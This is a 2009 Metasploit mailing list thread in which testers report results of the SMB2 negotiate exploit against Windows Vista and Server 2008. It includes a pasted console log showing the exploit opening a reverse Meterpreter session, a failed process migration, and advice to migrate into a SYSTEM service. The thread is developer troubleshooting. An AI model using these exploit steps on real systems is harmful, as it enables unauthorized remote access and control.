Metasploit mailing list archives
Metasploit 3.3 Development Updates
From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Tue, 29 Sep 2009 12:26:05 -0400
have you tried to migrate to another service running as system? instead of downgrading your permissions by migrating to explorer or moving to another process with different set of credentials. On Tue, Sep 29, 2009 at 12:16 PM, Matt Gardenghi <mtgarden at gmail.com> wrote:
Is this caused by DEP? That might explain the successful exploit but failure to migrate.... On Tue, Sep 29, 2009 at 12:08 PM, David Gomes <skysbsb at gmail.com> wrote:I have tried against Windows Vista and sucessful exploit the vulnerability. However, i can't migrate to another process, and i can't exploit this same vulnerability twice. msf exploit(smb2_negotiate_func_index) > exploit [*] Connecting to the target (10.10.0.38:445)... [*] Started reverse handler [*] Sending the exploit packet (854 bytes)... [*] Waiting up to 180 seconds for exploit to trigger... [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (10.10.0.55:4444 -> 10.10.0.38:64969) meterpreter > ps Process list ============ 3952 Explorer.EXE C:\Windows\Explorer.EXE ... meterpreter > migrate 3952 [*] Migrating to 3952... ^C[-] Error while running command migrate: meterpreter > ps [-] Error running command ps: undefined method `write' for nil:NilClass /pentest/exploits/framework3/lib/rex/socket/ssl_tcp.rb:97:in `write'/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:59:in `send_packet'/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:92:in `send_packet_wait_response'/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:69:in `send_request'/pentest/exploits/framework3/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:216:in `get_processes'/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:190:in `cmd_ps'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:123:in `call'/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:123:in `run'/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'/pentest/exploits/framework3/lib/msf/base/sessions/meterpreter.rb:203:in `_interact'/pentest/exploits/framework3/lib/rex/ui/interactive.rb:48:in `interact'/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/core.rb:1007:in `cmd_sessions'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:127:in `run'./msfconsole:82 meterpreter > exit msf exploit(smb2_negotiate_func_index) > exploit [*] Connecting to the target (10.10.0.38:445)... [*] Started reverse handler [*] Sending the exploit packet (854 bytes)... [*] Waiting up to 180 seconds for exploit to trigger... [*] Exploit completed, but no session was created. On Tue, Sep 29, 2009 at 11:02 AM, Danilo Nascimento < danilo.nascimento.c at gmail.com> wrote:I can't exploit VMs in VirtualBox against Windows Server 2008 Enterprise/Standart (no updates) and Windows Vista Business en SP1 in a x86 Host and Guest SO. I've tried enable/disable the PAE/NX option but a BSOD ocurred when i run the exploit. Which VM Application are you using? When i have some free time i'll test in Vmware ESXi and XEN. This exploit works fine against physical machines (Vista SP1 and Windows Server 2008) for me, the problem is that i can't migrate to another process (Explorer.exe) and i can exploit only once. Danilo Nascimento On Tue, Sep 29, 2009 at 9:01 AM, HD Moore <hdm at metasploit.com> wrote:On Tue, 2009-09-29 at 12:42 +0200, Giorgio Casali wrote:Unfortunately I tried it against a Vista Sp2 Enterprise and exploit failed while on a Vista SP2 Ultimate I ended up with a BSOD. Any idea where I should look into?Were seeing reports of it failing about 50/50 with physical machinesandworking almost always with VMs - either way we need to dig into it and do a little more work. Thanks for the feedback! -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-- David Gomes Guimar?es, Graduando em Ci?ncia da Computa??o - UFG, Estagi?rio da ?rea de redes - CERCOMP/UFG. _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-- Matt Gardenghi _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090929/1c1dac2a/attachment-0001.html>
Current thread:
- Metasploit 3.3 Development Updates HD Moore (Sep 28)
- Metasploit 3.3 Development Updates Giorgio Casali (Sep 29)
- Metasploit 3.3 Development Updates David Kennedy (Sep 29)
- Metasploit 3.3 Development Updates HD Moore (Sep 29)
- Metasploit 3.3 Development Updates Giorgio Casali (Sep 29)
- Metasploit 3.3 Development Updates Danilo Nascimento (Sep 29)
- Metasploit 3.3 Development Updates David Gomes (Sep 29)
- Metasploit 3.3 Development Updates Matt Gardenghi (Sep 29)
- Metasploit 3.3 Development Updates Carlos Perez (Sep 29)
- Metasploit 3.3 Development Updates HD Moore (Sep 29)
- Metasploit 3.3 Development Updates Sebastian Schöbinger (Sep 29)
- Metasploit 3.3 Development Updates Giorgio Casali (Sep 29)
- <Possible follow-ups>
- Metasploit 3.3 Development Updates Sebastian Schöbinger (Sep 29)
- Metasploit 3.3 Development Updates STS301 (Sep 29)